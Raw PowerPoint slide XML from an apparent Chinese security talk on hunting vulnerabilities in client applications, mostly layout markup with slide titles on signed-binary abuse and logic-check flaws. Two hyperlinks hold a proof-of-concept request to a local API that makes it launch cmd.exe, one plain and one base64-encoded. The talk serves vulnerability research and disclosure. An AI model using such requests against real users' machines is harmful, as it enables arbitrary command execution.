          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1630569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a:xfrm>
            <a:off x="1140204" y="5165113"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BDAE1562-358E-C843-8747-0833E2CF7E70}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/18</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="页脚占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="4829554"/>
            <a:ext cx="4114800" cy="365125"/>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a:xfrm>
            <a:off x="6932802" y="4846332"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D96E78F1-6360-7C4F-8F34-D4C81E64F7DD}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76A7395B-06F7-5A12-19B6-84D9A053A4DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="257525" y="258417"/>
            <a:ext cx="2763089" cy="238540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="卡通人物&#10;&#10;低可信度描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89538338-3997-5B80-DED3-E18EFED8274F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="261374" y="6415548"/>
            <a:ext cx="1800210" cy="235973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93513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40204" y="5165113"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BDAE1562-358E-C843-8747-0833E2CF7E70}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/18</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="页脚占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="4829554"/>
            <a:ext cx="41148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a:xfrm>
            <a:off x="6932802" y="4846332"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D96E78F1-6360-7C4F-8F34-D4C81E64F7DD}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A65E1C1-6B76-596C-440A-D864F67A77E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="257525" y="258417"/>
            <a:ext cx="2763089" cy="238540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="卡通人物&#10;&#10;低可信度描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52B100A2-4957-6BB6-B83A-6CD6583FA7A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="261374" y="6415548"/>
            <a:ext cx="1800210" cy="235973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155811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a:xfrm>
            <a:off x="1140204" y="5165113"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BDAE1562-358E-C843-8747-0833E2CF7E70}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/18</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="4829554"/>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6932802" y="4846332"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D96E78F1-6360-7C4F-8F34-D4C81E64F7DD}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9283ED35-BFD5-7A1B-CC20-03329051F070}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="257525" y="258417"/>
            <a:ext cx="2763089" cy="238540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="卡通人物&#10;&#10;低可信度描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE34511F-2F4B-019F-8B83-F952CC3AE9C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="261374" y="6415548"/>
            <a:ext cx="1800210" cy="235973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="781851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a:xfrm>
            <a:off x="1140204" y="5165113"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BDAE1562-358E-C843-8747-0833E2CF7E70}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2023/12/18</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="4829554"/>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6932802" y="4846332"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D96E78F1-6360-7C4F-8F34-D4C81E64F7DD}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{096A302F-7765-163F-1BD0-36B19DC25E51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="257525" y="258417"/>
            <a:ext cx="2763089" cy="238540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="卡通人物&#10;&#10;低可信度描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8BCC72B-67E2-D270-CDA7-07277BB65EC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="261374" y="6415548"/>
            <a:ext cx="1800210" cy="235973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124968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168"/>
            <a:ext cx="12192000" cy="6857832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1760083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h0stkey"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hyperlink" Target="https://github.com/cexer/wk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127.0.0.1:38230/api_install?file=cmd.exe&amp;param=/k%20notepad" TargetMode="Externa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127.0.0.1:38230/api_install?file=Y21kLmV4ZQ==&amp;param=L2sgbm90ZXBhZA=="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汽车的方向盘&#10;&#10;中度可信度描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95A2BC51-E794-95E3-9A9C-FCD9CBBCD913}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="19124"/>
            <a:ext cx="12192000" cy="6864626"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="573740" y="2024415"/>
            <a:ext cx="6257364" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>被忽视的暗面</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591670" y="2892927"/>
            <a:ext cx="4025154" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>客户端应用漏洞挖掘之旅</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="703010" y="3630136"/>
            <a:ext cx="1089088" cy="45719"/>
            <a:chOff x="3232298" y="1892595"/>
            <a:chExt cx="1089088" cy="53163"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形 1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文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EF23B53-16B3-8F5D-2376-C755900C71F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591670" y="3939676"/>
            <a:ext cx="2441694" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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戴城（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>EvilChen</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"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lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中孚信息元亨实验室</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>首席红蓝对抗安全研究员</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2105158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常规风险：白利用问题</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EFDE77F-D021-2195-9575-2E86A9C97982}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1522823" y="1742225"/>
            <a:ext cx="9406102" cy="4162280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E4B799B-D187-5C72-6AC4-03A641FFF03A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2878971" y="5912831"/>
            <a:ext cx="6434056" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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带有签名的程序，可以通过参数的方式执行任意命令（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>CreateProcess</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>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4087533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常规风险：逻辑校验问题</a:t>
            </a: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89AF27CC-5289-8696-69E7-A9B965E5148C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2204724" y="1907041"/>
            <a:ext cx="8302048" cy="4213167"/>
            <a:chOff x="1864964" y="1778714"/>
            <a:chExt cx="8755496" cy="4636143"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="文本框 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE2F96DB-7D28-D570-9235-7627AC978239}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4350858" y="2260657"/>
              <a:ext cx="1560423" cy="914424"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:no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基于</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>CE</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>搜索</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zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>用户</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>ID10001</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1DAE0290-1F6D-D2DC-98DF-749585E23E57}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1864964" y="1778714"/>
              <a:ext cx="2362467" cy="2134759"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="图片 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E2569E3-0A5D-F8C4-C81D-2C99637C24EF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5994366" y="1778714"/>
              <a:ext cx="4473999" cy="3730692"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="图片 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6907545A-419A-4E9A-70E5-11936655C2AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
